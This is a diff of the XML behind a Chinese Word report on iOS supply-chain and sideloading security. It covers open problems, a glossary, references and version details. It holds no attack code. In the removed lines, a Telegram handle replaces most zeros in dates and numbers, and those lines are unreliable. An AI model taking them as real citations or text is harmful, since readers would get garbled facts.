+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>未解决问题</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="22"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="280" w:hanging="280"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">1. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>孤儿库问题</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：大量长期未维护的库可能被攻击者劫持，如何建立维护者转移机制？</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="280" w:hanging="280"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">2. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>依赖传递风险</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：依赖的依赖可能存在风险，如何全面审计依赖树？</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="280" w:hanging="280"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">3. </w:t>
@@ -12594,18 +13276,33 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:b/>
         </w:rPr>
-        <w:t>企业证书滥用</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>：黑市上企业证书交易活跃，用于分发恶意应用</w:t>
+        <w:t>侧载安全</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：欧盟</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> DMA </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>要求开放侧载，如何平衡安全与开放？</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">4. </w:t>
@@ -12615,317 +13312,43 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:b/>
         </w:rPr>
-        <w:t>第三方应用商店风险</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>：欧盟</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> DMA </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>要求开放第三方商店，审核能力参差不齐</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="22" w:name="_Toc242275503"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">6.2 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>防御趋势</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="22"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="280" w:hanging="280"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">1. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>依赖签名验证</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">CocoaPods/SPM </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>可能引入依赖签名验证机制</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="280" w:hanging="280"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">2. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>构建环境隔离</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">CI/CD </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>系统加强隔离，减少攻击面</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="280" w:hanging="280"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">3. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>证书使用监控</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Apple </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>加强企业证书使用监控，滥用则吊销</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="280" w:hanging="280"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">4. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
         <w:t>第三方商店审核</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Apple </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>要求第三方商店承担审核责任</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="23" w:name="_Toc242275504"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">6.3 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>未解决问题</w:t>
+        <w:t>：如何保证第三方商店的审核能力？</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="23" w:name="_Toc242453641"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>附录</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：术语表</w:t>
       </w:r>
       <w:bookmarkEnd w:id="23"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="280" w:hanging="280"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">1. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>孤儿库问题</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>：大量长期未维护的库可能被攻击者劫持，如何建立维护者转移机制？</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="280" w:hanging="280"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">2. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>依赖传递风险</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>：依赖的依赖可能存在风险，如何全面审计依赖树？</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="280" w:hanging="280"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">3. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>侧载安全</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>：欧盟</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> DMA </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>要求开放侧载，如何平衡安全与开放？</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="280" w:hanging="280"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">4. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>第三方商店审核</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>：如何保证第三方商店的审核能力？</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="1"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="24" w:name="_Toc242275505"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>附录</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> A</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>：术语表</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="24"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -12946,6 +13369,12 @@
         <w:gridCol w:w="3057"/>
       </w:tblGrid>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -13017,6 +13446,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -13080,6 +13515,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -13150,6 +13591,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -13213,6 +13660,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -13290,6 +13743,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -13353,6 +13812,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -13420,12 +13885,16 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="1"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="25" w:name="_Toc242275506"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="24" w:name="_Toc242453642"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>附录</w:t>
       </w:r>
       <w:r>
@@ -13440,243 +13909,124 @@
         </w:rPr>
         <w:t>：参考资料</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="24"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="280" w:hanging="280"/>
+      </w:pPr>
+      <w:r>
+        <w:t>1. Palo Alto Networks Unit 42. "Malware XcodeGhost Infects 39 iOS Apps." 2015-09.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="280" w:hanging="280"/>
+      </w:pPr>
+      <w:r>
+        <w:t>2. GitGuardian. "CVE of the month: the supply chain vulnerability hidden for 10 years." 2024-07.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="280" w:hanging="280"/>
+      </w:pPr>
+      <w:r>
+        <w:t>3. SecurityWeek. "Critical CocoaPods Flaws Exposed Many iOS, macOS Apps to Supply Chain Attacks." 2024-07.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="280" w:hanging="280"/>
+      </w:pPr>
+      <w:r>
+        <w:t>4. Apple. "Building a Trusted Ecosystem for Millions of Apps: A Threat Analysis of Sideloading." 2024.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="280" w:hanging="280"/>
+      </w:pPr>
+      <w:r>
+        <w:t>5. USENIX Security 2026. "Dissecting the Gray-Market of Unauthorized iOS App Distribution." 2026.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="280" w:hanging="280"/>
+      </w:pPr>
+      <w:r>
+        <w:t>6. ACM. "iOSModZoo: A Large-Scale Study of Third-Party iOS App Markets." 2026.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="280" w:hanging="280"/>
+      </w:pPr>
+      <w:r>
+        <w:t>7. arXiv. "Characterizing Third-Party Iranian iOS App Stores." 2026-04.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="280" w:hanging="280"/>
+      </w:pPr>
+      <w:r>
+        <w:t>8. Apple Developer Forums. "Certificate Revocation Impact." 2021.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="280" w:hanging="280"/>
+      </w:pPr>
+      <w:r>
+        <w:t>9. SentinelOne. "CVE-2023-38606: Apple iPadOS Privilege Escalation Flaw." 2026-02.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="280" w:hanging="280"/>
+      </w:pPr>
+      <w:r>
+        <w:t>10. SecurityWeek. "Vulnerability Found in SimpleMDM Apple Device Management Solution." 2019-08.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="25" w:name="_Toc242453643"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>附录</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：版本与说明</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="25"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="280" w:hanging="280"/>
-      </w:pPr>
-      <w:r>
-        <w:t>1. Palo Alto Networks Unit 42. "Malware XcodeGhost Infects 39 iOS Apps." 2</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:t>15-</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:t>9.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="280" w:hanging="280"/>
-      </w:pPr>
-      <w:r>
-        <w:t>2. GitGuardian. "CVE of the month: the supply chain vulnerability hidden for 1</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> years." 2</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:t>24-</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:t>7.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="280" w:hanging="280"/>
-      </w:pPr>
-      <w:r>
-        <w:t>3. SecurityWeek. "Critical CocoaPods Flaws Exposed Many iOS, macOS Apps to Supply Chain Attacks." 2</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:t>24-</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:t>7.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="280" w:hanging="280"/>
-      </w:pPr>
-      <w:r>
-        <w:t>4. Apple. "Building a Trusted Ecosystem for Millions of Apps: A Threat Analysis of Sideloading." 2</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:t>24.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="280" w:hanging="280"/>
-      </w:pPr>
-      <w:r>
-        <w:t>5. USENIX Security 2</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:t>26. "Dissecting the Gray-Market of Unauthorized iOS App Distribution." 2</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:t>26.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="280" w:hanging="280"/>
-      </w:pPr>
-      <w:r>
-        <w:t>6. ACM. "iOSModZoo: A Large-Scale Study of Third-Party iOS App Markets." 2</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:t>26.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="280" w:hanging="280"/>
-      </w:pPr>
-      <w:r>
-        <w:t>7. arXiv. "Characterizing Third-Party Iranian iOS App Stores." 2</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:t>26-</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:t>4.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="280" w:hanging="280"/>
-      </w:pPr>
-      <w:r>
-        <w:t>8. Apple Developer Forums. "Certificate Revocation Impact." 2</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:t>21.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="280" w:hanging="280"/>
-      </w:pPr>
-      <w:r>
-        <w:t>9. SentinelOne. "CVE-2</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:t>23-386</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:t>6: Apple iPadOS Privilege Escalation Flaw." 2</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:t>26-</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:t>2.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="280" w:hanging="280"/>
-      </w:pPr>
-      <w:r>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:t>. SecurityWeek. "Vulnerability Found in SimpleMDM Apple Device Management Solution." 2</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:t>19-</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:t>8.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="1"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="26" w:name="_Toc242275507"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>附录</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> C</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>：版本与说明</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="26"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13695,13 +14045,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>1.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>t.me/one00190</w:t>
+        <w:t>1.0</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13713,43 +14057,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>26-1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>7</w:t>
+        <w:t>2026-10-07</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13762,6 +14070,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13807,6 +14118,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13838,6 +14152,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13857,6 +14174,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13873,6 +14193,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -13907,19 +14232,20 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>https://t.me/pjx712</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
+        <w:t>https://t.me/one00190</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:bookmarkStart w:id="26" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="26"/>
+    </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId7"/>
-      <w:footerReference w:type="default" r:id="rId8"/>
+      <w:headerReference w:type="even" r:id="rId7"/>
+      <w:headerReference w:type="default" r:id="rId8"/>
+      <w:footerReference w:type="even" r:id="rId9"/>
+      <w:footerReference w:type="default" r:id="rId10"/>
+      <w:headerReference w:type="first" r:id="rId11"/>
+      <w:footerReference w:type="first" r:id="rId12"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1360" w:bottom="1440" w:left="1360" w:header="851" w:footer="992" w:gutter="0"/>
       <w:cols w:space="720"/>
@@ -13955,6 +14281,16 @@
 </file>
 
 <file path=word/footer1.xml><?xml version="1.0" encoding="utf-8"?>
